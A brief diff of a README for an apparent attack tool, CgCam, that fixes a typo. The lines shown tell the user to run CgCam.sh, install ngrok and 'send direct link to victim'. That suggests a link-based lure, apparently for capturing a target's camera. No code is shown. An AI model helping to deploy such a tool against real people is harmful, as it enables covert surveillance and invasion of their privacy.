CgSecl/CgCam/README.md

 chmod +x CgCam.sh
 ./CgCam.sh
 ```
-## Then send direct link to vivtim and done.
+## Then send direct link to victim and done.

 note: you need to install ngrok first